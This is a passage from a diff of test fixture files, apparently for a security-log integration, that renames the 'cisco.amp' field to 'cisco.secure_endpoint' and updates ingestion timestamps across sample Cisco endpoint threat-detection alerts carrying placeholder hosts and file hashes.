                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -837,13 +822,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546100246Z",
+                "ingested": "2021-09-27T00:41:08.619295558Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -947,13 +932,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546102333Z",
+                "ingested": "2021-09-27T00:41:08.619297337Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -1057,13 +1042,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546104374Z",
+                "ingested": "2021-09-27T00:41:08.619299094Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -1134,7 +1119,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:41.546106398Z",
+                "ingested": "2021-09-27T00:41:08.619300818Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:32:58.000Z",
@@ -1145,7 +1130,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1229,7 +1214,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546108632Z",
+                "ingested": "2021-09-27T00:41:08.619302894Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1240,7 +1225,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1307,7 +1292,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:41.546110725Z",
+                "ingested": "2021-09-27T00:41:08.619304755Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:24:58.000Z",
@@ -1318,7 +1303,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1399,7 +1384,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546112777Z",
+                "ingested": "2021-09-27T00:41:08.619306521Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1410,7 +1395,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1484,7 +1469,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546114815Z",
+                "ingested": "2021-09-27T00:41:08.619308263Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1495,7 +1480,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1569,7 +1554,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546116850Z",
+                "ingested": "2021-09-27T00:41:08.619310004Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1580,7 +1565,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1649,7 +1634,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:41.546119034Z",
+                "ingested": "2021-09-27T00:41:08.619311865Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:22:29.000Z",
@@ -1661,7 +1646,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.B1380FD95B-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1742,7 +1727,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546121122Z",
+                "ingested": "2021-09-27T00:41:08.619313625Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1753,7 +1738,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1827,7 +1812,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546123192Z",
+                "ingested": "2021-09-27T00:41:08.619315366Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1838,7 +1823,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1912,7 +1897,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546125243Z",
+                "ingested": "2021-09-27T00:41:08.619317120Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1923,7 +1908,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2001,7 +1986,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546127347Z",
